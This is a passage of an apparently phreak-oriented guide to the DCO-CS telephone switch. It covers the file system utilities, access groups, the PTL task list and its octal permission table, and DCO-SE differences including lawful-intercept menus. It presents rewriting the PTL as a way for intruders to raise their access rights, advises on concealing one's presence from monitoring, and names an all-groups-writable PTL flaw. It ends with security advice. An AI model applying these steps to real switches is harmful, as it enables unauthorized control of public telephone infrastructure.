+   SCHEDULE    - SCHEDULE DSKMGR TO RUN
+   SDIR        - SHORT DISK DIRECTORY
+   SFDIR       - SHORT FULL DISK DIRECTORY
+   TYPE        - PRINT TEXT FILE CONTENTS
+   VOLCHG      - CHANGE A VOLUME LABEL
+
+
+As stated previously, the DCO-CS filesystem is divided into many 
+directories and sub-directories beginning with the /ROOT/ directory. The 
+file attributes that may be input at ATTRIB are:
+
+
+FIL> ENTER ATTRIB (ATTRIB=HELP) >
+
+   ABCPSU -  ABORT TASK ON CPSU
+   ABSWO  -  ABORT TASK ON A/B SWITCHOVER
+   CCHOFF -  TASK RUNS WITH CACHE OFF
+   CP1SYS -  SINGLE COPY ALLOWED PER SYSTEM
+   CP1TTY -  SINGLE COPY PER TERMINAL ALLOWED
+   DBFILE -  DATA BASE FILE
+   DCCNTL -  UNDER DIAGNOSTIC CONTROL
+   INCSWO -  INHIBITS MP CONTROLLED SWITCHOVER
+   INDSPA -  TASK HAS SEPARATE I AND D SPACE
+   INSTLL -  TASK MAY BE INSTALLED
+   INTACT -  TASK IS INTERACTIVE
+   KTASK  -  KERNAL TASK
+   MEMSEG -  TASK IS MEMORY RESIDENT SEGMENTED
+   MRDATA -  MEMORY RESIDENT DATA BASE
+   NOABRT -  DO NOT ALLOW ABORT OF TASK
+   NOINTS -  TASK RUNS WITH INTERRUPTS OFF
+   NONMAN -  NO MANUAL INITIATION OR ABORT ALLOWED
+   NOSTAT -  NO PRINT IN ACT STAT LIST IF BLOCKED
+   QUEREQ -  QUEUE REQUEST IF TASK ACTIVE
+   RBOABR -  RE-BOOT ON ABORT
+   RESCED -  RESCHEDULE TASK IF ABORTED
+
+FIL> ADDITIONAL HELP (MORE=YES) >
+
+   SEGMNT -  SEGMENTED TASK
+   SGUMAP -  UNMAP UNUSED MEMORY AFTER SEGMENT LOAD
+   SHRMEM -  SHARE MEMORY IF TASK ACTIVE
+   STKCON -  ALLOCATE STACK CONTIGUOUS TO PROGRAM
+   STKHI  -  ALLOCATE STACK FROM UPPER PAR AVAILABLE                            
+
+
+Blocks of memory on the disk may be manually edited with BLKEDT (the 
+$MEMMAP utility displays block numbers, types, sizes, and names):
+
+
+FIL> ENTER DEVICE (DEVICE=HELP) > SY
+
+FIL> ENTER BLOCK (BLOCK=HELP) >
+
+   VALID BLOCKS ARE OCTAL NUMBERS FROM
+   0 TO THE MAXIMUM FOR THIS DEVICE.
+
+FIL> ENTER BLOCK (BLOCK=HELP) > 0
+
+   LOCATION: 000000  000002  000004  000006  000010  000012  000014  000016
+      VALUE: 000240  000402  000042  000340  106427  000340  010167  000602
+FIL> NEW VALUE: HELP
+
+   ADV    - ADVANCE TO NEXT 8 WORDS OF BLOCK
+   BCK    - BACKUP TO PREVIOUS 8 WORDS OF BLOCK
+   EXIT   - EXIT BLKEDT WITHOUT DISK UPDATE
+   DONE   - DONE, UPDATE BLOCK TO DISK
+   OCTAL NUMBERS RANGING FROM 0 TO 177777
+
+                                       
+DIR, FDIR, SDIR, and SFDIR all display in some fashion the disk directory. 
+DIR displays the components of the directory in the following format:
+
+
+FIL> ENTER FUNCTION (FUNC=HELP) > DIR
+
+FIL> ENTER FILENAME (FILE=HELP) >
+
+   ANY FILENAME
+
+FIL> ENTER FILENAME (FILE=HELP) > /
+
+  FILENAME  TYPE  CREATION DATE     LAST CHANGE    FILE SIZE PRIO A HDRADDR
+
+/ROOT/
+   BITMAP     FRSP
+AMPPAT    DIR 03-00-00 00:00:00 03-00-00 00:00:00 000000220 0000 0 00XXXXXX
+
+/ROOT/AMPPAT/
+T0000_RES P/D 03-00-00 00:00:00 03-00-00 00:00:00 000000002 0000 0 00XXXXXX
+P0054_RES P/D 04-00-00 00:00:00 04-00-00 00:00:00 000000367 0000 0 00XXXXXX
+P0068_RES P/D 04-00-00 00:00:00 04-00-00 00:00:00 000000306 0000 0 00XXXXXX
+P0070_RES P/D 04-00-00 00:00:00 04-00-00 00:00:00 000000764 0000 0 00XXXXXX
+P0119_RES P/D 04-00-00 00:00:00 04-00-00 00:00:00 000002501 0000 0 00XXXXXX
+
+
+The filename, file type, creation date, date of last change, file size, 
+priority, and address on the hard disk are displayed. The two file types 
+are DIR (directory) and P/D (program, .txt file, .dat file, etc.). FDIR 
+(Full Disk Directory) displays a few more aspects of files examined:
+
+
+FIL> ENTER FUNCTION (FUNC=DIR) > FDIR
+
+FIL> ENTER FILENAME (FILE=ROOT/) >
+
+  FILENAME  TYPE  CREATION DATE     LAST CHANGE    FILE SIZE PRIO A HDRADDR
+
+/ROOT/
+BITMAP    FRSP
+AMPPAT    DIR 03-00-00 00:00:00 03-00-00 00:00:00 000000220 0000 0 00XXXXXX
+          ACCESS  - (MAINT ,RWX)
+          EXTENTS - 71(1.)
+
+/ROOT/AMPPAT/
+T0000_RES P/D 03-00-00 00:00:00 03-00-00 00:00:00 000000001 0000 0 00XXXXXX
+          ACCESS  - (MAINT ,RWX)
+          EXTENTS - 14304(1.)
+P0054_RES P/D 04-00-00 00:00:00 04-00-00 00:00:00 000000376 0000 0 00XXXXXX
+          ACCESS  - (ADMIN ,RW),(TMRS  ,RW),(STATUS,RW),(MAINT ,RW)
+                    (SECURE,RW),(NAC   ,RW),(ESPF,RW)
+          EXTENTS - 212753(5.)                                                  
+
+
+In addition to the attributes displayed with DIR, with FDIR the access 
+rights and extents of the files are displayed. Access rights are displayed 
+in the format (GROUP, ABC) where ABC is populated with R (read), W (write),
+and/or X (execute). SDIR will only display subdirectories within the 
+directory initially given (if a directory is initially provided) in the 
+minimal DIR format. If a subdirectory containing P/D files is entered, the 
+attributes of those files will be printed in the single-line minimal format
+as well. SFDIR will display the directories in the "full format" (with 
+access and extents) before the P/D files, as does SDIR. Access rights are 
+modified through ACCESS:
+
+
+FIL> ENTER FUNCTION (FUNC=HELP) > ACCESS
+
+FIL> ENTER FILENAME (FILE=HELP) > FILENAME
+
+FIL> ENTER FUNCTION (FUNCTION=HELP) >
+
+   ADD    - ADD ACCESS RIGHTS
+   DELETE - DELETE ACCESS RIGHTS
+   LIST   - LIST ACCESS RIGHTS
+
+FIL> ENTER FUNCTION (FUNCTION=HELP) > LIST
+
+   GROUP    RIGHTS
+   -----    ------
+   ADMIN     R
+   TMRS      R
+   STATUS    R
+   MAINT     R
+   SECURE    R
+   NAC       R
+   ESPF      R
+   SCAT      RW
+
+FIL> ENTER FUNCTION (FUNCTION=LIST) > ADD
+
+FIL> GROUP (GROUP=HELP) >
+
+   ENTER ANY OF THE FOLLOWING GROUP NAMES
+
+   ADMIN
+   TMRS
+   STATUS
+   MAINT
+   SECURE
+   NAC
+   ESPF
+   SPARE1
+   SPARE2
+   SPARE3
+   SPARE4
+   SPARE5
+   SPARE6
+   SPARE7
+   SPARE8
+   SCAT
+   DONE - UPDATE FILE ACCESS RIGHTS ON DISK                                     
+
+
+The setting of access rights through FILSYS will alter the access rights 
+stored in the file PTL.TXT, which may also be modified alternately and 
+directly as discussed in the next section.
+ 
+PTL Modification-
+
+To comprehend this concealment technique it is necessary to possess an 
+understanding of the derivation of access rights in the file system. 
+Occasionally (or often, depending upon the utilities used and the account 
+logged on) the curious hacker/phreak will find that the "INSUFFICENT ACCESS
+RIGHTS" message will be displayed at attempts to invoke particular 
+programs/utilities or to view certain files. Even using the disk directory 
+options/functions of the $FILSYS utility it will be observed that 
+information for certain files is irretrievable due to insufficient access. 
+The inevitable question then arises as to where all of these access rights 
+are defined. Rewarded is the hacker who considers this sort of question-the
+context of DCO exploration is no exception. Access rights and many other 
+attributes are defined and stored in an ASCII text file named PTL.TXT, 
+(access rights are merely a tertiary option) in the /ROOT/ directory, 
+appropriately entitled the Prioritized Task List-the PTL is the very heart 
+of the filesystem on a DCO-CS. At the beginning of the PTL all options and 
+the format of entries are explained:
+
+
+***************************************************************************
+!***** RELEASE OCC150 DEVELOPMENT PRIORITIZED TASK LIST *******************
+!**************************************************************************
+!	
+!
+!
+!
+! The PRIORITIZED TASK LIST is free format ASCII text file. Any line that
+! begins with an exclamation point(!) is assumed to be a comment, all other
+! lines are assumed to be data lines. If a data line ends with a dash(-)the
+! next line is used to continue the line. A data line may be no more than
+! 1000 characters in length. Since this file is free format multiple blanks
+! or tabs are treated as a single space. 
+!
+! The PTL defines the list of tasks contained in a given release and the
+! desired order in which to place the tasks on the disk. The PTL also 
+! defines the options, the processor type, and the values of the CP 
+! switches, e.g.: file type, access rights.
+!
+! A data line consists of the DCO file specification followed by optional 
+! switch modifiers.
+!
+!---------------------  BEGIN SWITCH DEFINITIONS  -------------------------
+!
+! -proc <type>        the processor type. This is used to determine the
+!                     search rules for the file.
+! 
+! -input <file>       the input file name. If this switch is NOT given the
+!                     input file name is derived from the output file
+!                     specification. If the output file specification does
+!                     NOT have an extension, an extension of .DTC is used.
+!                     [EG: -INPUT STD.H]
+!
+! -for <option>       the file is required FOR this option(feature). If the
+!                     site has this option, the file will be copied to the
+!                     DCO disk. If this switch is NOT given, the file is 
+!                     assumed to be part of the GENERIC and is always
+!                     copied to the DCO disk. Options may be OR'ed together
+!                     by separating the options by a vertical bar(|).
+!                     [EG: -FOR LAB|ANI]
+! 
+! -disk <nbr>         forces the file to be copied to the given disk, if a
+!                     a multi-disk set is required to hold all the files. 
+!                     If this switch is NOT given and a multi-disk set is
+!                     required, the file will be placed on the first disk
+!                     with enough available free space.
+!                     [EG: -DISK 0]
+!
+! -size <bytes>       make sure that at least X number of bytes are
+!                     reserved. If this switch is NOT given the number of 
+!                     bytes reserved is determined by the size of the file.
+!                     [EG: -SIZE 1792]
+!
+! -access  <#,#,#>    give the access rights to a file. These are used to
+!                     define the first three words of the rights section
+!                     in the DCO file header. If this switch is NOT given
+!                     a value of 177777 is used for the three values. The
+!                     values must be in OCTAL representation.
+!                     [EG:  -ACCESS 1000,1000,1000     -ACCESS ,100000,1]	
+!                     The order is: READ,WRITE,EXECUTE
+!
+! -load               the file is to be used for the load/boot block
+!                     on the DCO disk. Although the load block is NOT
+!                     referenced by a DCO file specification, one is
+!                     required in the PTL for completeness. The -INPUT
+!                     switch is normally used in conjunction with this
+!                     switch to specify the input file. Only one file may 
+!                     be marked with the -LOAD switch. That file is treated
+!                     as task created by TKB and is loaded from byte offset
+!                     1024(02000).
+!                     [EG: /boot_block -proc mp -load -input inildr.tsk]
+!
+! -offset             the offset into the input file at which to start
+!                     reading the data.  Used only with the -LOAD switch
+!                     [eg:  please see the Appendix PTL file.]
+!
+! -ama_store          designate as a special AMA storage file. This switch
+!                     should be used with the -DISK switch to inform KUT
+!                     on which disk the file should be placed.
+!                     [EG: please see the Appendix PTL file.]
+!
+! -dir                the DCO file specification is a DIRECTORY, valid
+!                     switch modifiers are -FOR -ENTRIES & -RIGHTS
+!
+! -entries <nbr>      reserve the given number of DIRECTORY entries
+!
+! -boot               the file is designated a BOOT file. If this switch is
+!                     NOT given the file is designated a PROGRAM/DATA file.
+!
+! -data               the file is copied as a binary data file. A DCO
+!                     file header is created.
+! 
+! -text               the file is copied as ASCII text file. A DCO file
+!                     header is created.
+!
+!                     NOTE: if neither the -DATA or -TEXT switch is given
+!                     the file is copied as an IMAGE file. In this
+!                     case a DCO file header is NOT created, but
+!                     assumed to exist in the input file.
+!
+! -name  <name>       used to specify the internal name of a file.
+!                     [eg: -name RPLDAT]
+!
+!------------------------  END SWITCH DEFINITIONS  ------------------------
+!
+!
+!-------------------------  BEGIN "FOR" OPTIONS  --------------------------
+!                  
+!    This section defines the valid options (features) that may be used
+!    with this release's ptl files. These options are to be used in 
+!    conjuction with the "-for" and "-ifnot" switches. Those ptl entries 
+!    that do not have a "-for" switch are defined as generic tasks/files 
+!    and will be put on all disks kut for this release.
+!
+!	alt		Automatic Line Insulation Test
+!	ama		Automatic Message Accounting
+!	big_ama		AMA 10mb Emergency Storage on 2d IOmega disk
+!       codc		Remote Polled LAMA
+!	dialup		Dial-up Terminal Secure Access
+!	dli		Data Link Interface (OCC3)
+!       dntrans         DN transperancey         
+!       esp             Essential Service Protection Feature 
+!	ess		Emergency Switching Service
+!	fp		Feature Processor
+!	gen	     	The Base Line Generic
+!	hard_disk	MSS Winchester (not iomega)
+!	lab		Switch to allow all options for lab systems
+!	lab_test	Tasks for testing in S-C lab only - not for fld use
+!	rcc		Radio Common Carrier
+!      	res		Reseller (OCC4)
+!	rls1000		Remote Line Switch 1000, 360
+!	rls4000		Remote Line Switch 4000
+!	rpl3 - rpl7	Protocol selection for RPL (rplc03,rphp03,dlip03)
+!	simul		Simulator Options for specific Simulator Tasks
+!	small_ama	AMA  3mb Emergency Storage on 1st IOmega disk
+!       synopsis        site synopsis text file for dbgen databases
+!	trafsep		Traffic Separation (Source Destination)
+!       trktst          Trunk Testing
+!	win	   	Winchester Hard Disk Drive
+!	wkup		Wake-up Service
+!
+!  The following options were made generic per customer service on 9/19/91
+!
+!     * abn             Automatic Balance Network
+!     *	aci		Alarm Control Interface
+!     *	bbt		Board to Board Test
+!     *	boc_tmrs	Traffic Measure't Reptg. Sys w/BOC Config (LSSGR)
+!     * bx25            Bell x25 Interface - Operations Sys Netwrk Protocol
+!     * cba             coin box accounting
+!     *	dmp		Duplex Maintenance Processor
+!     *	e2a		Switch Cntl Ctr Sys (SCCS) w/E2A Telemetry
+!     *	eadas		Bell Eng. and Admin. Data Acquisition System
+!     *	pora		Point of Origin Recorded Announcement
+!     *	rlg		Remote Line Group
+!     *	rmas		Bell Remote Memory Administration System
+!     *	rns		Remote Network Switch
+!     *	rotl		Remote Office Test Line
+!     *	slc96		SLC-96 Interface
+!     *	smp		Simplex Maintenance Processor
+!     *	tsitpp		High-Density TSI/TPP Subsystem
+!     * veac		Virtual Equal Access
+!
+!  The following options were made codc per customer service on 9/19/91
+!
+!     #	amatps		Protocol selection for AMATPS option
+!     #	bisync		Protocol selection for IBM BISYNC application
+!     #	hdlc		Protocol selection for pollstar application
+!
+!--------------------------  END "FOR" OPTIONS  ---------------------------
+!
+!---------------------  BEGIN PROCESSOR DEFINITIONS  ----------------------
+!
+!    The following is the list of valid processor ids for this release to 
+!    be used with the -proc switch. Each processor id is usually associated
+!    with an unique SCM software set.
+!
+!    ac             = aci
+!    al             = alit
+!    amp            = amp message database
+!    bxc            = bx25
+!    cbc            =
+!    cp             = call processor
+!    dct            = database software (dbver, dbview, dbchek, ...)
+!    dli            =
+!    fc             =
+!    fp             = feature processor
+!    inet           = To add intelligent network MP files to KUT medium.
+!    lg             = lgc (line group controller)
+!    lt             = ltc
+!    ma             = mah/mar (rls1000)
+!    mci            = 
+!    md             = mdc
+!    mp             = maint/admin processor
+!    mp_text        = command files (com directory)
+!    ptl            = to add ptl file to disk
+!    rg             = rlg (remote line group controller)
+!    rlr            =
+!    rph            =
+!    rls4           = rls4000 tasks
+!    rls68          = 68000 processor tasks for RLS4000, created 9/30/90.
+!    rt             = rtc (slc96)
+!    ss7            =      
+!    up             =
+!    tmp            =
+!
+!----------------------  END PROCESSOR DEFINITIONS  -----------------------
+!
+!-------------------------  BEGIN PTL FILE LIST  --------------------------
+!
+/boot_block -proc mp -load -offset 01000 -input inildr.dtc
+/smosld -proc mp -boot  -disk 0
+!       
+/com/a -proc mp_text -text -input a.txt -dynamic -
+	-access ,100000,0
+/a15shu -proc mp  -
+       	-access 100000,100000,100000
+/abnutl -proc mp -
+        -access 100000,100000,100011
+/abort -proc mp  -
+	-access 100000,100000,
+/segment/diag2/type5/abotcp -proc mp  -
+	-access ,100000,0
+/segment/diag2/type5/abotst -proc mp  -
+	-access ,100000,0
+/required/abrt -proc mp -disk 0 -
+	-access 100000,100000,
+/driver/acidrv -proc mp -
+	-access 100000,100000,100000
+/download/acipgm -proc ac -
+	-access ,100000,0
+/acisu -proc mp -
+	-access 100000,100000,100010
+/acitst -proc mp -
+	-access 100000,100000,100010
+-------List truncated for brevity-----------
+
+!--------------------------  END PTL FILE LIST  ---------------------------
+
+
+Access rights in the PTL are denoted with a "-access" switch under file 
+options, in the following syntactical order: READ, WRITE, EXECUTE; in other
+words, the octal values which represent account access permissions for a 
+file denote consecutively, from left to right, which accounts are permitted
+to read (or view) the file in question, write to it, or execute it if it is
+executable. The following table of octal values may prove useful:
+
+Octal Value     Group(s) with Permission
+===========     ========================
+0               NONE
+1               ADMIN
+2               TMRS
+10              MAINT
+100000          SCAT
+100001          ADMIN, SCAT
+100002          TMRS, SCAT         
+100005          ADMIN, STATUS, SCAT
+100010          MAINT, SCAT
+100011          ADMIN, MAINT, SCAT
+100012          TMRS, MAINT, SCAT
+100013          ADMIN, TMRS, MAINT, SCAT
+100014          STATUS, MAINT, SCAT
+100020          SECURE, SCAT
+100024          STATUS, SECURE, SCAT
+100030          MAINT, SECURE, SCAT
+100035          ADMIN, STATUS, MAINT, SECURE, SCAT
+100036          TMRS, STATUS, MAINT, SECURE, SCAT
+100037          ADMIN, TMRS, STATUS, MAINT, SECURE, SCAT
+100042          TMRS, NAC, SCAT
+100050          MAINT, NAC, SCAT
+100071          ADMIN, MAINT, SECURE, NAC
+100075          ADMIN, STATUS, MAINT, SECURE, NAC
+100077          ADMIN, TMRS, STATUS, MAINT, SECURE, NAC, SCAT
+100140          NAC, ESPF, SCAT
+100141          ADMIN, NAC, ESPF, SCAT
+100150          MAINT, NAC, ESPF, SCAT
+100154          STATUS, MAINT, NAC, ESPF, SCAT
+100155          ADMIN, STATUS, MAINT, NAC, ESPF, SCAT
+100160          SECURE, NAC, ESPF, SCAT
+100164          STATUS, SECURE, ESPF, SCAT
+100175          ADMIN, STATUS, MAINT, SECURE, NAC, ESPF, SCAT
+100177          ADMIN, TMRS, STATUS, MAINT, SECURE, NAC, ESPF, SCAT
+177777          ALL DEFINED GROUPS
+
+Any octal value in this table indicates the groups with the permission that
+it occupies under "-access" in the PTL. For instance, if a file had -access
+10, 100000, 100001, the MAINT group would have read permission, the SCAT 
+group write permission, and the ADMIN and SCAT groups execute permission. 
+Most accounts have read access to the PTL, but only SCAT has default write 
+access to it. The PTL (and other files) may be modified in the $EDIT 
+utility. Alternately the PTL.TXT file could be downloaded using $XFER (the 
+file transfer command/program), modified, and re-uploaded.
+
+
+Memory Reading-
+
+An alternate way of reading/analyzing the information in various files such
+as the PTL, though of slightly limited usefulness, lies in the use of 
+utilities such as $DUMPER to dump the contents of the file in question in a
+base of one's selection or ASCII. Note that, unfortunately, it is 
+impossible to dump the contents of a file to which one does not already 
+have access, for the file would have to be read by the utility in order for
+its contents to be output. Still, the indirect access of files in this 
+manner may prove useful in a few situations-for instance, if everything on 
+a particular terminal was heavily monitored (echoed to the SCC, perhaps?) 
+and the direct reading and/or editing of files an extremely revealing 
+factor. Then again, if one follows the procedures described throughout 
+these notes for concealing one's presence on the switch even rather heavy 
+monitoring ought not to be a major obstruction.
+
+$DUMPER /NODIAL
+
+DUM> FILE NAME (FILE=HELP) > /ROOT/PTL.TXT
+
+DUM> BASE (BASE=HELP) > 
+
+   DECIMAL OR 10 - WILL OUTPUT THE DATA AND ADDRESSES IN DECIMAL
+   OCTAL OR 8 - WILL OUTPUT THE DATA AND ADDRESSES IN OCTAL
+   HEXIDECIMAL OR 16 - WILL OUTPUT THE DATA AND ADDRESSES IN HEXIDECIMAL
+   IF YOU PRECEED THE RESPONSE WITH AN A, SUCH AS A10 OR AOCTAL,
+   THEN THE DATA WILL BE OUTPUT IN ASCII AND THE ADDRESS IN THE BASE
+   EXIT - WILL EXIT THIS TASK
+
+DUM> BASE (BASE=HELP) > AHEX
+
+DUM> TYPE (TYPE=HELP) > 
+
+   HEADER - WILL OUTPUT THE FILE HEADER
+   DATA - WILL OUTPUT THE ACTUAL CONTENTS OF THE FILE
+   EXIT - WILL EXIT THIS TASK
+
+DUM> TYPE (TYPE=HELP) > DATA
+
+DUM> START ADDRESS (START=HELP) > 3000
+
+DUM> STOP ADDRESS (STOP=HELP) > 9000
+             00  01  02  03  04  05  06  07  08  09  0A  0B  0C  0D  0E  0F
+   003000     -           B   E   G   I   N       P   R   O   C   E   S   S
+   003010     O   R       D   E   F   I   N   I   T   I   O   N   S
+   003020     -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -
+   003030     -   -   -   -   -   -   -   -  \n   !  \n   !
+   003040     T   h   e       f   o   l   l   o   w   i   n   g       i   s
+   003050         t   h   e       l   i   s   t       o   f       v   a   l
+   003060     i   d       p   r   o   c   e   s   s   o   r       i   d   s
+   003070         f   o   r       t   h   i   s       r   e   l   e   a   s
+   003080     e       t   o       b   e  \n   !                   u   s   e
+   003090     d       w   i   t   h       t   h   e       -   p   r   o   c
+   0030a0         s   w   i   t   c   h   .           E   a   c   h       p
+   0030b0     r   o   c   e   s   s   o   r       i   d       i   s       u
+   0030c0     s   u   a   l   l   y       a   s   s   o   c   i   a   t   e
+   0030d0     d       w   i   t   h  \n   !                   a   n       u
+   0030e0     n   i   q   u   e       S   C   M       s   o   f   t   w   a
+   0030f0     r   e       s   e   t   .  \n   !  \n   !                   a
+   003100     c                                                       =
+   003110     a   c   i  \n   !                   a   l
+   003120                                     =       a   l   i   t  \n   !
+   003130                     a   m   p
+   003140                 =       a   m   p       m   e   s   s   a   g   e
+   003150         d   a   t   a   b   a   s   e  \n   !                   b
+   003160     x   c                                                   =
+   003170     b   x   2   5  \n   !                   c   b   c
+   003180                                         =  \n   !
+   003190     c   p                                                       =
+   0031a0         c   a   l   l       p   r   o   c   e   s   s   o   r  \n     
+
+
+Additional Information/Conclusion
+---------------------------------
+
+Other/Miscellaneous/General-
+
+The DCO family product line is currently owned/supported by Genband, an IP 
+Multimedia System company based in Texas. Interestingly, the DCO-CS is also
+the only major Class 5 switch on the PSTN for which VoIP conversion 
+hardware to operate in conjunction with the switching hardware has not been
+widely manufactured, with the exception of a few media gateways. Its use in
+the future is likely to diminish due to its aging status, although DCO 
+switches are to be found servicing many rural communities. Contrary to 
+popular belief, all installed DCOs have not been replaced by the EWSD or 
+other, newer switches. It was estimated as of 2006 that approximately 14 
+million lines were installed on North American DCO and EWSD switches, and 
+that over 2,500 host and remote switches comprise the DCO install base in 
+North America.
+ 
+An Additional Note: DCO-SE-
+
+Another member of the DCO family worthy of mention is the DCO-SE, a line 
+switch capable of servicing up to 10,000 lines, as opposed to the DCO-CS, 
+which is capable of servicing only a very limited number of lines and is 
+primarily concerned with long distance (inter-LATA) related service. The 
+software of the DCO-SE is enhanced and although the MMI is extremely 
+similar, several alterations of note exist, due to its main function. In 
+fact, an entire albeit brief article could be devoted to the 
+differentiations between these two switches in the DCO family, but here for
+reasons of succinctity only the more "interesting" aspects of the DCO-SE 
+will be mentioned, those most major alterations to the MMI and switch 
+utilities. First, the $ADMIN utility contains many different options, such 
+as the following:
+
+DCO>
+$ADMIN
+
+ADM>HELP
+
+ENTER THE GROUP TYPE TO BE ADMINISTERED.
+   SOME OF THESE GROUPS ARE ACCESS RESTRICTED
+   ERR          - DISPLAY ERROR CODES FROM DBMS
+   ACCESS       - ISDN BRI ACCESS
+   BG           - BUSINESS GROUPS (CENTREX,MVP1,MVP2)
+   CARRIER      - EQUAL ACCESS CARRIER CODE
+   CC           - CUSTOM CALLING QUERIES
+   CEI          - CUSTOMER EQUIPMENT INTERFACE
+   COMM         - DATA COMMUNICATIONS
+   COS          - CLASS OF SERVICE
+   CODRES       - CODE RESTRICTION LIST
+   CV           - CLASS VALUES (VOICE DATA PROTECTION)
+   DOP          - DIAL OUT PLAN
+   E911T        - EMERGENCY 911 TANDEM
+   ESS          - EMERGENCY SWITCHING SERVICE, RLS-4000
+   FKMP         - FEATURE KEY MANAGEMENT PROFILE
+   FN           - FEATURE NAME
+   HG           - HUNT GROUPS
+   IG303        - INTERFACE GROUPS 303
+   LAW          - LAWFUL ACCESS
+   LCC          - LINE CLASS CODES  
+
+Contrasted with a DCO-CS $ADMIN menu:
+
+
+   ERR          - DISPLAY ERROR CODES FROM DBMS
+   AIN          - ADVANCED INTELLIGENCE NETWORK
+   CEI          - CUSTOMER EQUIPMENT INTERFACE
+   COS          - CLASS OF SERVICE
+   CODRES       - CODE RESTRICTION LIST
+   CV           - CLASS VALUES (VOICE DATA PROTECTION)
+   FN           - FEATURE NAME
+   HG           - HUNT GROUPS
+   LCC          - LINE CLASS CODES
+   LCN          - LINE CLASS NAMES
+   LINE         - EN/DN LINES
+   MACRO        - MACRO DEFINITIONS
+   MBG          - MAKE BUSY GROUPS
+   NRT          - NETWORK DN TRANSPARENCY ROUTE TREATMENTS
+   OPTIONS      - FEATURE OPTIONS
+   RING         - DEFAULT RING CODES
+   SITE         - SITE NAME
+   SS7          - SIGNALING SYSTEM NUMBER 7
+
+$ADMIN, as one may recall from the HELP text, is described as the utility 
+used for "RECENT CHANGE/DATABASE ADMINISTRATION". Since the DCO-SE has 
+support for Centrex and may service up to 10,000 lines, administration 
+groups such as BG, CC, ESS, etc. have been added, and groups such as SS7, 
+AIN, MACRO, MBG, etc. do not exist as they do on the DCO-CS. Second, two 
+additional default account groups exist on the DCO-SE-LAW and NOVICE:
+
+LAW-LAW is used for the lawful survellience/monitoring of lines authorized 
+under legislation such as CALEA. Within the $ADMIN utility, an option "LAW"
+exists to this end as seen above:
+
+ADM> GROUP (GROUP=HG) > LAW
+  It is illegal to access Lawful Access surveillance information
+  without the knowledge and expressed permission of the telephone
+  operating company controlling this telecommunications facility.
+  Further, it is illegal to establish any surveillance activity
+  without receipt of a court order issued by a federal, state or
+  local court having jurisdiction to permit telecommunications
+  surveillance activity. Violation of these warnings will subject
+  the perpetrator to all of the penalties and consequences
+  allowable under such controlling laws.
+
+ADM> LATYPE (LATYPE=HELP) > 
+
+   CDC           - CDC
+   FSK           - FSK MODEM       
+   OPTIONS       - OPTIONS
+   RECEIVER      - RECEIVER
+   SURVEILLANCE  - SURVEILLANCE
+
+Invoking LAW will display a banner as seen above with the necessary legal 
+warnings of accessing surveillance information. This banner is seemingly 
+intended for observation by law enforcement, rather than other potential 
+unauthorized users of the switch. LAW has access rights to files/utilities 
+over which all groups have some degree of access.
+
+NOVICE-Perhaps intended for use by technicians in training or employees 
+untrained in DCO operation as the name suggests, NOVICE only has access to 
+utilities and files to which all account groups have access, and its access
+rights are always the lowest for a particular file or utility. For example,
+on files such as EA24HD, EA30MD, and EA60MD to which all other account 
+groups have at least read and execute permissions, both NOVICE and LAW have
+only execute permission.
+
+One gaping vulnerability present in the DCO-SE (equipped with the most 
+recent software version, released in 2003) is that, unlike on the DCO-CS, 
+all account groups have read AND write permissions on the PTL! Any account 
+may thus directly write to the PTL, redefining access rights for files, 
+etc. On the DCO-CS, release OCC150, as stated previously, only SCAT has 
+write permission/access.
+
+
+Utilities Diagram
+
+
+Notes: Although every utility technically has some degree of influence on 
+the network, certain utilities serve strictly on-switch functions (and thus
+exert an indirect influence over the PSTN) and others network functions 
+(and thus exert a more direct influence over the PSTN). There exists, of 
+course, no such utility as a "strictly off-switch program", but, as said, 
+there are varying degrees of network vs. switch influence. Naturally 
+utilities concerned with the operation of switch hardware (such as the 
+disk, processors, etc.) are classified as "intra-switch", whereas 
+SS7-related programs, line and trunk utilities, etc. are classified as 
+"extra-switch". This three-layered conception of DCO utilities is rather 
+useful in determining the nature of account groups and purposes. This 
+diagram is by no means intended to be inclusive of all or even most 
+utilities-rather, it encompasses a small sampling of the utilities that 
+best epitomize the three categories. Described differently, extra-switch 
+utilities are closest to the network and intra-switch utilities are 
+furthest from it.
+
+
++------------------------------------------+
+Extra-Switch Utilities
+
+$ABNUTL, $CODE, $HOTLIN,$INWANI, $INWATS, 
+$NITSWC, $RGU,  $ROTL,  $ROUTE,  $RTOPT,  
+$RTR,    $SCTST,$TRACE, $TSEP,  etc.
+
+
+
++------------------------------------------+
+Intra/Extra-Switch Utilities "Bridge"
+
+$CONUTL, $CSADM, $EQCHEK, $FLXANI, $MANUAL,
+$PABX,   $PCOS,  $RNSAMA, $RTEST,  $SELNUM
+$SERV,   $SPCALL,$TFM,    $TKTHRS, $TMAD,
+$TTU, etc.
+
+
+
++------------------------------------------+
+Intra-Switch Utilities
+
+$ACTUTL, $AMOPT, $AMPUTL, $BUFDMP, $CBUG, 
+$CHKUTL, $DEBUG, $DMPUTL, $DUMPER, $EDIT, 
+$FILSYS, $FPBUG, $GBUG,   $HSTUTL, $INSTAL,
+$ISUUTL, $MEMCHK,$PASSWM, $PATCH,  $REMOVE,
+$SECTTY  $STATE, $STATUS, $TIME,   $UPACK,  
+$UPDATE, $VCHECK,$XFER, etc.
+
++------------------------------------------+
+
+
+Recommendations for Security-
+
+In light of the above information regarding the near-absolute absence of 
+preventative security measures inherent in the design of the DCO, it may 
+seem a comically futile undertaking to recommend measures to the end of 
+effective DCO-CS securement. Let it not be forgotten, though, that 
+throughout the spirited and relished elucidation of the flaws in access 
+security, a number of metaphorical "hurdles" or configurations proving 
+through some often diminutive manner slightly problematic for those whose 
+objective it is to access the switch are discussed. It follows logically, 
+then, that the exaggeration of those in discretional configuration to as 
+great a degree as is practically possible is desirable for the maximum 
+security that one may extract/derive from the limited faculties of the DCO 
+dedicated thereto. When discussing dialup security, alas, it seems best to 
+simply disallow dialup access to the switch in order to prevent any form of
+remote unauthorized intrusion. Yet, as the author is keenly aware, this 
+effective albeit extreme configuration/measure is not always practical and 
+efficient to implement, in which case, one is advised to affix to the 
+dial-in line(s) dedicated to the purpose a callback security device, add an
+additional layer of password security, etc.; while exploitable flaws 
+certainly exist in these shields, they at least may provide a sufficiently 
+strong barrier as to discourage all but the most determined of unauthorized
+users. In all instances, regardless of the configuration of the dial-in 
+port/lines, one is obviously and finally advised to mandate the use of the 
+strongest passwords possible, and to review and monitor diligently the 
+logs, the trails generated by the actions of users. It is simply laughable 
+that systems exist, on the PSTN and elsewhere, which exhibit a tremendous 
+amount of security and yet so little significance in comparison to the 
